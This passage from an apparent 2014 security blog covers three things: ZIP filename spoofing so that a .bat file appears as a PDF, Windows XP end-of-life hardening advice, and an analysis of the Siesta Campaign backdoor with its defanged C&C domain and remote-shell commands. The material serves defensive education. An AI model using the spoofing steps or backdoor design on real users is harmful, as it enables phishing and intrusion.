<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTAXZY_qmo4_CfSF9j43XUw_-tkAI6N2ItUyOCTetzIhFF-_DLNZ6mOlz7veM-rcY0SNEJPUFRQi7fhYfipzXLjmoT-sPXa6PI7keh4Meql5qq6SglVPRYtHYZpLeY2tqhGDvfknAdMXA/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTAXZY_qmo4_CfSF9j43XUw_-tkAI6N2ItUyOCTetzIhFF-_DLNZ6mOlz7veM-rcY0SNEJPUFRQi7fhYfipzXLjmoT-sPXa6PI7keh4Meql5qq6SglVPRYtHYZpLeY2tqhGDvfknAdMXA/s1600/3.png" /></a></div>
<br />
<ul>
<li>If you open the the ZIP file with <a href="http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm#download" target="_blank">XVI32</a> you will see the name of the file twice inside the compressed file.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1twbT7g2huSpUkG84aK8k-MEbyz-lJZZ9sLX17BToFG-fyO1Ug0geOcl823kvUOyz8kBY7oOWErq36OIliAY6x5t9uKmdnhpxizC_sT4TCnHrpLx1WH_W8e93fWCP4Uv3Hr5FNEel_Sw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1twbT7g2huSpUkG84aK8k-MEbyz-lJZZ9sLX17BToFG-fyO1Ug0geOcl823kvUOyz8kBY7oOWErq36OIliAY6x5t9uKmdnhpxizC_sT4TCnHrpLx1WH_W8e93fWCP4Uv3Hr5FNEel_Sw/s1600/4.png" /></a></div>
<br />
<ul>
<li>Now, we need to change the second one. I've renamed the file to ".pdf" and I've saved it.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6YdkQH-N_fZdr0f5lXxwTCkVViscYnvCpXN3INCCrvjG3HZ9Na5YGPOICWCQbN3csPlHrx-CkVJQf9AiXFsHn8X3TNPUIKwlE8Qz1v8u1LFMkByn-JF3BUdyQUStyd_uj1dx4Bgd74tM/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6YdkQH-N_fZdr0f5lXxwTCkVViscYnvCpXN3INCCrvjG3HZ9Na5YGPOICWCQbN3csPlHrx-CkVJQf9AiXFsHn8X3TNPUIKwlE8Qz1v8u1LFMkByn-JF3BUdyQUStyd_uj1dx4Bgd74tM/s1600/5.png" /></a></div>
<br />
<ul>
<li>If we open the ZIP file again, we can see a file with a PDF format...</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8GxeNGJ6_eHSYpCExw-g1eGbdku3V5aOre4sxlELOmfjsu-XJIobp7ZMX4U6Cu5ikjfFtKuI6UwpMV8hCBJdkGq1vg4l6-mHa1wFngj5vTTmiYiQTj0Tr9oG6RB7wPs4DGj9WaZkNhFQ/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8GxeNGJ6_eHSYpCExw-g1eGbdku3V5aOre4sxlELOmfjsu-XJIobp7ZMX4U6Cu5ikjfFtKuI6UwpMV8hCBJdkGq1vg4l6-mHa1wFngj5vTTmiYiQTj0Tr9oG6RB7wPs4DGj9WaZkNhFQ/s1600/6.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<ul>
<li>... but if we open it directly from the Winrar, the .bat file is executed...</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8E-iEV8Kfa8WNullQtxZ3ETSaRVHJLT5gkkGZflAtbyPlcaNG8stMmmXzMu0SXV9KdADHmHqOrLGPbcDMotkxa7CoLbecwOF59n36DEtIL1x7EQjJzW5skOjeFGUlwLi9vFowxLBFEf4/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8E-iEV8Kfa8WNullQtxZ3ETSaRVHJLT5gkkGZflAtbyPlcaNG8stMmmXzMu0SXV9KdADHmHqOrLGPbcDMotkxa7CoLbecwOF59n36DEtIL1x7EQjJzW5skOjeFGUlwLi9vFowxLBFEf4/s1600/8.png" /></a></div>
<br />
<div style="text-align: justify;">
But if you uncompress the file into a folder, you will see the real file "Best Security Tools 2014.bat" instead of the "fake" file "Best Security Tools 2014.pdf".</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, I think there is nothing more to say about the capabilities this technique has. Imagine mixing this technique with the one used in the <a href="http://www.behindthefirewalls.com/2014/03/siesta-campaign-nothing-is-what-it-seems.html" target="_blank">Siesta Campaign</a>...</div>
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com2tag:blogger.com,1999:blog-3160485247929481680.post-82639206982756913082014-04-08T14:03:00.000-07:002014-04-07T14:03:34.223-07:00Microsoft XP has died but millions of Zombies-XP are out there<div style="text-align: justify;">
<h2>
Introduction </h2>
After 12 years, support for Windows XP ends today, April 8, 2014. That means there will be no more security updates or technical support for Windows XP. So XP has officially died but millions of computers with this operating system installed are still "alive" and will be unprotected against new threats from right now, these are the Zombies-XP. Even thousands of ATM's and other critical infrastructures will be using this OS for a while, nobody knows how long...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQmdXSwI4jMkdoDh6uQhLt2Ee8vidub9uKQ3I8EUfGxH5smSk2qwtF2InTIqoC-9Cs28jGk72mlx7XfboQOhQ6DJIgZELy7A9JNwwRpbGzkdZr6hdfiXt2uu8imc4xsDM7ZVFylCymS1o/s1600/Zombie_XP_by_killer7.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQmdXSwI4jMkdoDh6uQhLt2Ee8vidub9uKQ3I8EUfGxH5smSk2qwtF2InTIqoC-9Cs28jGk72mlx7XfboQOhQ6DJIgZELy7A9JNwwRpbGzkdZr6hdfiXt2uu8imc4xsDM7ZVFylCymS1o/s1600/Zombie_XP_by_killer7.jpg" height="200" width="320" /></a></div>
<div style="text-align: justify;">
And what is the advice from Microsoft? We have two options.<br />
<br />
1. To upgrade to a newer Windows operating system like Windows 7 or Windows 8.1.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
2. "If your current PC can't run Windows 8.1, it might be time to consider shopping for a new one."</div>
<br />
<br />
<div style="text-align: justify;">
Sure, we should upgrade to the lastest Windows OS. If our hardware doesn't support it, we should buy a new computer or hundreds in the case of some companies and install Windows 8.1, working hard to transfer all data from one computer to the another, teach the users to use Windows 8.1, etc... Or maybe it is a great opportunity to move to a free Linux operating system, but that is another issue...</div>
<br />
<div style="text-align: justify;">
This post is focused on users or companies who are not allowed to upgrade to the lastest Windows OS for different reasons like not being able not afford to buy new computers, to have old software which is not capable of runnig in other OS, to not have staff enough to perform the upgrade, etc...</div>
<h2>
The main threats we need to deal with</h2>
First of all we need to keep in mind the attack vectors we need to fight with.
<br />
<ul>
<br />
<li style="text-align: justify;">Browser-based attacks. I think these attacks could be the most common attacks at this moment. A website could take advantage of a web browser vulnerability just by visiting it. Also, a website could exploit a plugin enabled in the web browser, like Java or Adobe plugins, in the same way.</li>
</ul>
<br />
<ul>
<li style="text-align: justify;">Network Exploits. New worms could be designed to exploit the Windows XP services running in a computer. Now, they are unprotected so the same worm could work in the future after being discovered.</li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Social Engineering techniques. These techniques try to trick<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> a user into opening a link in an email or open an attachment supposed to be a PDF file or whatever "legitimate" file to infect a machine. Look at the case of the <a href="http://siesta%20campaign./" target="_blank">Siesta Campaign.</a></span></span></li>
</ul>
<br />
<div style="text-align: justify;">
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">These attacks vectors are common to other OS, but in this case it is really dangerous if we use one which will not have security updates in the future. We will be vulnerable against </span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">ZeroDay threats</span></span> (that is common to all OS) and known threats. Without having security updated we can't fix the previosly mentioned.</span></span></div>
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"></span></span></div>
<h2>
Suggested solutions</h2>
<div style="text-align: justify;">
Here, I will suggest some advice to try to keep your environment more secure using Windows XP.</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li>Most antivirus software manufacturers plan to support Microsoft XP until at least April 2016. So try not to select one which stops supporting XP before that date.</li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Choose a web browser with a long-term support plan like Google Chrome which <a href="http://chrome.blogspot.com.es/2013/10/extending-chrome-support-for-xp-users.html%20" target="_blank">extends the support for XP users until April 2015</a>. On the other hand, Mozilla Vice President said: "We have no plans to discontinue support for our XP users", so consider using this browser too.</li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Try not to use plugins in your browser like Java, Adobe Reader, Adobe flash... but if you need them, be sure they are updated (if there are updates available). I use this <a href="https://browserscan.rapid7.com/scanme" target="_blank">site</a> to check if my plugins browser are updated. </li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Don't use not administrative accounts. Most of exploits target desktop software (like web browsers and the plugins we mentioned above) are mitigated if the user account is a standard user.</li>
</ul>
<br />
<ul>
<li style="text-align: justify;">Isolate your Windows XP computers in multiple subnetworks behind your network firewalls. That is really important because your XP is already vulnerable and when it is infected, it will be used by hackers to pivot to other systems in your network to try to get access to your data and network resources.</li>
</ul>
<br />
<ul style="text-align: justify;">
<li>Monitor these isolated networks to find suspicious activities. Monitor your network traffic to look for possible command and control connections, an increase of network activity, internal probing techniques, brute force attempts from these networks, etc...</li>
</ul>
<ul>
</ul>
<ul style="text-align: justify;">
</ul>
<ol>
</ol>
<ol>
</ol>
<ul style="text-align: justify;">
<li>Limit the access to the Internet. It is really important not to give full access to the Internet to your users. You can use proxy rules or URL filtering in your firewalls devices. Just give access to sites which are needed to work. We want to avoid websites with exploit kits or other kinds of attack. Yes, I know, <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">legitimate sites are hacked and begin to spread malware like the case of <a href="http://www.behindthefirewalls.com/2013/10/analysis-attack-technical-analysis-php.html" target="_blank">the attack to php.net</a></span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> but we need to have less risk by limiting the access to other sites.</span></span> </li>
</ul>
<br />
<ul style="text-align: justify;">
</ul>
<ul>
<li style="text-align: justify;">Teach your users to be careful. Every user could be targeted for attack using social engineering. No matter the position of the employees, each computer is a good entry point to pivot to your network. Advise them to check and <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">be suspicious of each email they receive. If they have doubts, they must ask the security department.</span></span></li>
</ul>
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-89618151374953835622014-03-26T10:24:00.000-07:002014-03-31T02:24:29.945-07:00Siesta Campaign - Nothing is what it seems<div style="text-align: justify;">
<h3>
Introduction </h3>
A few weeks ago Trend Micro published in their blog the post below: <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/the-siesta-campaign-a-new-targeted-attack-awakens/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29" target="_blank">The Siesta Campaign: A New Targeted Attack Awakens</a>. Here they share their research about a targeted attack suffered by all kinds of industries: Energy, Finance, Health care, Public administration... Some days after that, FireEye published in their blog a post called <a href="http://www.fireeye.com/blog/technical/targeted-attack/2014/03/a-detailed-examination-of-the-siesta-campaign.html" target="_blank">A Detailed Examination of the Siesta Campaign</a> where <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">they accuse <a href="http://intelreport.mandiant.com/" target="_blank">APT1</a> group or </span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">another group that uses the same tactics and tools as the guilty party of these attacks.</span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thanks to Trend Micro has shared the malware sample's checksum of one variant, I've been able to get a copy of it to get deep into this issue.
</div>
<br />
<div style="text-align: left;">
</div>
<div style="text-align: center;">
SHA1: <a href="https://www.virustotal.com/en/file/943a7838f3eccc0984219642f533deaffb7b99e8c1d51157115bc87cf72aa80f/analysis/" target="_blank">014542eafb792b98196954373b3fd13e60cb94fe</a> </div>
<h3>
Spear-Phishing and Social Engineer Techniques</h3>
<div style="text-align: justify;">
It is said (in both posts) that this campaign began with an spear-phishing email with links to archives. The file was named "<i>Questionaire Concerning the Spread of Superbugs February 2014.exe" </i>and it was compressed in a ZIP file hosted in a remote server.</div>
<div style="text-align: justify;">
<br />
I guess that the attackers used the same technique described in <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><a href="http://intelreport.mandiant.com/" target="_blank">APT1</a></span></span> report written by Mandiant. The file could have a PDF extension but the file name actually includes serveral spaces after “.pdf” followed by “.exe”, the real file extension<i>. </i>In the picture bellow you will see the file that looks like a PDF file.<i> </i><br />
<i> </i> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMO_Xmf8V2bNVCM4QwV1IMw1WpvfMIB970v9ZNt_XDIuZ-x7Otm7mCSwDsClxj-gM6N9JT-HiHAdaGE2PCXotuF2Z7fc4igD00-ppkwEbyUQ_gI31oRMknmJVmQLs-ayuPdyaJRDpD3sk/s1600/pdf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMO_Xmf8V2bNVCM4QwV1IMw1WpvfMIB970v9ZNt_XDIuZ-x7Otm7mCSwDsClxj-gM6N9JT-HiHAdaGE2PCXotuF2Z7fc4igD00-ppkwEbyUQ_gI31oRMknmJVmQLs-ayuPdyaJRDpD3sk/s1600/pdf.png" height="267" width="400" /></a></div>
<br />
If we change to detail view we will see a PDF file... <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwgW-jgeIecbMlBHw38iM1SRIyHv5jw7An4B2hev6HYaCPFXRpg4_JOyHaZJrw5bg7_KgBSw_3s803NX6pAjks05OrqR_SrO9jeJGAbjInnXVF9XvsBsLHbOOIIThBnO6WlILZX5mtwRg/s1600/PDF2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwgW-jgeIecbMlBHw38iM1SRIyHv5jw7An4B2hev6HYaCPFXRpg4_JOyHaZJrw5bg7_KgBSw_3s803NX6pAjks05OrqR_SrO9jeJGAbjInnXVF9XvsBsLHbOOIIThBnO6WlILZX5mtwRg/s1600/PDF2.png" height="19" width="640" /></a></div>
<br />
<div style="text-align: justify;">
... but it actually is not a PDF file... It looks like a PDF but it is an executable file...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8qAl8WBqBhugsCZcBFzg4BKUAIc5AyZHTFHg9jlrMFSE5fJ0rPTGNdc3EW19yZCgUq1RlsBe0jlBTlctD237WJvdbxUQjzoQw_CwIPAH8ycwR69pa6NwlfjV6kl0bZVbI-GbdERRHH2s/s1600/PDF3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8qAl8WBqBhugsCZcBFzg4BKUAIc5AyZHTFHg9jlrMFSE5fJ0rPTGNdc3EW19yZCgUq1RlsBe0jlBTlctD237WJvdbxUQjzoQw_CwIPAH8ycwR69pa6NwlfjV6kl0bZVbI-GbdERRHH2s/s1600/PDF3.png" height="14" width="640" /></a></div>
<br />
<div style="text-align: justify;">
That is the way this file will be showed in the Desktop. That really seems a PDF file for a untrained eye.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2inJvOjDaCQiPyz1STPhyI_fABfNKqtb_UzcPs0B_UmiRp284MpGKhSGSn2wfbbIXFu_KBzK-GFTmW31xQEbNjH7pvpa_Ou1NkRVpKWoTWjBvk408y02Mji2HIcNILlXz3Ag2kYjCGKk/s1600/PDF4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2inJvOjDaCQiPyz1STPhyI_fABfNKqtb_UzcPs0B_UmiRp284MpGKhSGSn2wfbbIXFu_KBzK-GFTmW31xQEbNjH7pvpa_Ou1NkRVpKWoTWjBvk408y02Mji2HIcNILlXz3Ag2kYjCGKk/s1600/PDF4.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
When we run <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">what appears to</span> <span class="hps">be a</span> PDF <span class="hps">file, the executable drop a real PDF file and it is opened... The normal user could thing that nothing weird has happened... The user received and e-mail with a PDF and now it is already opened...</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhni9_phJ5leU7PVlCuP4IfQ99cY1suImnsjYUCGxg5FH1Z1CvQlxuog4oomXESU9A7_AR0OU1MzQmtk08QyGGvPE9oTZSe5BxaZz4rRieWMxmLkVBIBALhn2XQJLXEzwOaZOfCkONRrUE/s1600/PDF5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhni9_phJ5leU7PVlCuP4IfQ99cY1suImnsjYUCGxg5FH1Z1CvQlxuog4oomXESU9A7_AR0OU1MzQmtk08QyGGvPE9oTZSe5BxaZz4rRieWMxmLkVBIBALhn2XQJLXEzwOaZOfCkONRrUE/s1600/PDF5.png" height="265" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: justify;">
... but it drops another executable in the background called UIODesrvr.exe. This file is the real malware. </div>
<br />
<div style="text-align: center;">
SHA1: <a href="https://www.virustotal.com/en/file/2b2ff60c535ec2a049210455afff7853054a6e61e008188140153683cebb8f8b/analysis/" target="_blank">56bcdac7bbf5f99a496c78e2fff0d9bed96c458e</a> </div>
<br />
If we look at all process running in our machine, we will see that this malware is being executed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiddD2iYs3N6LziXcFbmu4K4wxpMPidyVw7Ly-gE6XAyIJKUVUM9hyphenhyphen0Nk5Et7p5hASb0ErrylC_KT0SJZHbN0XW50SAFA22HH6XuS-hqoApACal6wejNgas4icjwL64filcQ1PAAs6Wrhs/s1600/TaskManager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiddD2iYs3N6LziXcFbmu4K4wxpMPidyVw7Ly-gE6XAyIJKUVUM9hyphenhyphen0Nk5Et7p5hASb0ErrylC_KT0SJZHbN0XW50SAFA22HH6XuS-hqoApACal6wejNgas4icjwL64filcQ1PAAs6Wrhs/s1600/TaskManager.png" /></a></div>
<h2>
Brief Malware Analysis</h2>
That file was compiled at 2014/02/19.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3XuJVaA1r-oc9l5f3jjN1dVp4UfLeDrn1dkWI4eRArIup3Z4_uLR6DwXFQi31__u_NcYxTbktevQeAeJ8m4W8jYR_WvRgav4F_1SqtDMt63ULirrsZTolxKTSBNqp8ByGVtHN-wb8zwE/s1600/PE_Date.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3XuJVaA1r-oc9l5f3jjN1dVp4UfLeDrn1dkWI4eRArIup3Z4_uLR6DwXFQi31__u_NcYxTbktevQeAeJ8m4W8jYR_WvRgav4F_1SqtDMt63ULirrsZTolxKTSBNqp8ByGVtHN-wb8zwE/s1600/PE_Date.png" /></a></div>
<br />
<div style="text-align: justify;">
The first thing the malware does is to connect to www[.]skyslisten[.]com which seems to be the C&C server. This server isn't currently available.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhznRAdgT6VnkD9ampwmm6cZfXV7YKNvFXw3Di3-KNdK_VRMwnRTOjtekO4uvFiIzjM316KNtDJhXiRTtYVby3msxW5zfRl7fEbRvMlMEJ2tu6C5bW8xLIQUTuGbhfHOqoRP-4v_oIFel8/s1600/URL_IDA_HEX.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhznRAdgT6VnkD9ampwmm6cZfXV7YKNvFXw3Di3-KNdK_VRMwnRTOjtekO4uvFiIzjM316KNtDJhXiRTtYVby3msxW5zfRl7fEbRvMlMEJ2tu6C5bW8xLIQUTuGbhfHOqoRP-4v_oIFel8/s1600/URL_IDA_HEX.png" height="32" width="400" /></a></div>
<br />
<div style="text-align: justify;">
The User-Agent used by the malware is "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0)".</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkxucH3dZ0wuHGEWF3ZPxl1D-ukf9vtmP8WTbKKb0EZesqzi-cp8Dmm-oiBqYMoJekC7vA1-FbaQn1DybkQjNGS0s5xuys2vdfvesZqEpg4wHEJTFkTD3d0545FipIUmLHHMpJ8Avq-j4/s1600/User_Agent_IDA_Hexa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkxucH3dZ0wuHGEWF3ZPxl1D-ukf9vtmP8WTbKKb0EZesqzi-cp8Dmm-oiBqYMoJekC7vA1-FbaQn1DybkQjNGS0s5xuys2vdfvesZqEpg4wHEJTFkTD3d0545FipIUmLHHMpJ8Avq-j4/s1600/User_Agent_IDA_Hexa.png" height="47" width="400" /></a></div>
<br />
<div style="text-align: justify;">
We can see in our IDA that the first thing the malware does is to check if that code ">SC<" is written within HTML code at the domain mentioned above. If it exists, then it tries to locate some commands written in the web server to be executed. <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">According to</span> <span class="hps">Trend Micro, these are the commands used in by this malware.</span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8wuavmoCov1WqNmscpAD2Yp3tEqmGcXqhHtSnJdsZDpzaL7yd6kYCmLCQ9q0xXp1nC1rIkcvOBhJZbCYica_nB2iNUVNZn9zmZHto8ZzKjotVYMgTA0-1UUZDfRi9YCvsFCVYsp3Vc_8/s1600/commands.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8wuavmoCov1WqNmscpAD2Yp3tEqmGcXqhHtSnJdsZDpzaL7yd6kYCmLCQ9q0xXp1nC1rIkcvOBhJZbCYica_nB2iNUVNZn9zmZHto8ZzKjotVYMgTA0-1UUZDfRi9YCvsFCVYsp3Vc_8/s1600/commands.png" /></a></div>
<u>HTTP code </u><br />
prefix: “>SC<”<br />
<br />
<u>Commands</u><br />
“run1” open a remote shell<br />
“run2” pipe shell commands from URL1<br />
“run3” pipe shell commands from URL2<br />
“http” pipe shell commands from C2<br />
“x_” sleep for specified number of minutes<br />
<br />
<br />
<br />
<div style="text-align: justify;">
This is the typical behavior of a backdoor to begin to start with a lateral movement.</div>
<h2>
Tracking the attacker</h2>
<div style="text-align: justify;">
As we said before, the domain www[.]skyslisten[.]com seems to be the C&C server. The picture bellow will show you who registered this domain.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK10hb77QwAYQktQ4tuEJ4ch8U5ibP_gYCVDL9KXtwCKIbIgY56i6eOw47d0-ME9keUngKtvYaNsmeUlQLfrGbGYFFVTZhqBsy5KYNpqSXyl1m7IBo8jqz2cNy0ZYajSD-FF3aCgBrzSo/s1600/register.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK10hb77QwAYQktQ4tuEJ4ch8U5ibP_gYCVDL9KXtwCKIbIgY56i6eOw47d0-ME9keUngKtvYaNsmeUlQLfrGbGYFFVTZhqBsy5KYNpqSXyl1m7IBo8jqz2cNy0ZYajSD-FF3aCgBrzSo/s1600/register.png" /></a></div>
<br />
<div style="text-align: justify;">
This guy registered microsofthomes[.] com. FireEye says in their report that this domain is directly connected with the last one mentioned above.</div>
<br />
The picture bellow will show you some domains registered by this guy. Only five domains from more than a total of roughly 17,000 domains registered with this same email address said by Trend Micro.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCzl1zXFMs1K2p0oDQyCRMZ_IQ5OtYuYuCcmvc8Ds6fFbxD7VzQm652LlIATcHWcQGBe2cjM9CqUPXLOf8G6J1Syd6KRZYRqWk3fxBvMiSGtuL0K7-tQ8c3r9_KUqVY0U2j3H1liSXE0g/s1600/Register-II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCzl1zXFMs1K2p0oDQyCRMZ_IQ5OtYuYuCcmvc8Ds6fFbxD7VzQm652LlIATcHWcQGBe2cjM9CqUPXLOf8G6J1Syd6KRZYRqWk3fxBvMiSGtuL0K7-tQ8c3r9_KUqVY0U2j3H1liSXE0g/s1600/Register-II.png" /></a></div>
<h2>
Conclusion</h2>
<div style="text-align: justify;">
When we talk about APT or Targeted attacks, examples of well-known sophisticated Malware like Stuxnet, Flame, Careto and security breaches suffered by companies like Google, RSA, Adobe, Apple came to my mind ... But as we have seen, it is not necessary to develop a sophisticated malware to perform a Targeted Attack. Obviously, the most sophisticated attack will be most successful...</div>
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com1tag:blogger.com,1999:blog-3160485247929481680.post-15594523133196158162014-02-17T01:28:00.003-08:002014-02-17T08:05:34.163-08:00Hiding your Cuckoo Sandbox v1.0 from malware in an easy way<div style="text-align: justify;">
Cuckoo v1.0 was published some months ago but some time has passed since I've had time to install it with my friend <a href="https://twitter.com/cor3dump3d" target="_blank">cor3dump3d</a>, who has saved me a lot of time...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I have seen some new valuables features in this release. Maybe I will write a post in the future about it but for now, I am going to show you how to avoid to Cuckoo being detected by malware.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It is a trend that the malware uses anti-virtualization techniques in order to avoid being analyzed by Sandboxes like Cuckoo. I've noticed a rise in the malware techniques which use this capability. The modern malware could change their behaviour if it detects that it is being executed in a virtual environment. If you already use Cuckoo to analyze your samples, you also can appreciate other techniques like the detection of debuggers and forensics tools.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzYaUs6yrqXZp6fzX5KRgsqfQna1nJkTxExdWUZfFBEBJbbGEm1XlbkaQJv1BrstOtAak4hdrpDGQ1uwxV8lZKChg9IKqdJvftOModvV7XweNXeP7Y7LJigZmrsXdO4p9XDiBT80BpS9g/s1600/Pafish.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzYaUs6yrqXZp6fzX5KRgsqfQna1nJkTxExdWUZfFBEBJbbGEm1XlbkaQJv1BrstOtAak4hdrpDGQ1uwxV8lZKChg9IKqdJvftOModvV7XweNXeP7Y7LJigZmrsXdO4p9XDiBT80BpS9g/s1600/Pafish.png" height="240" width="400" /></a></div>
<br />
<div style="text-align: justify;">
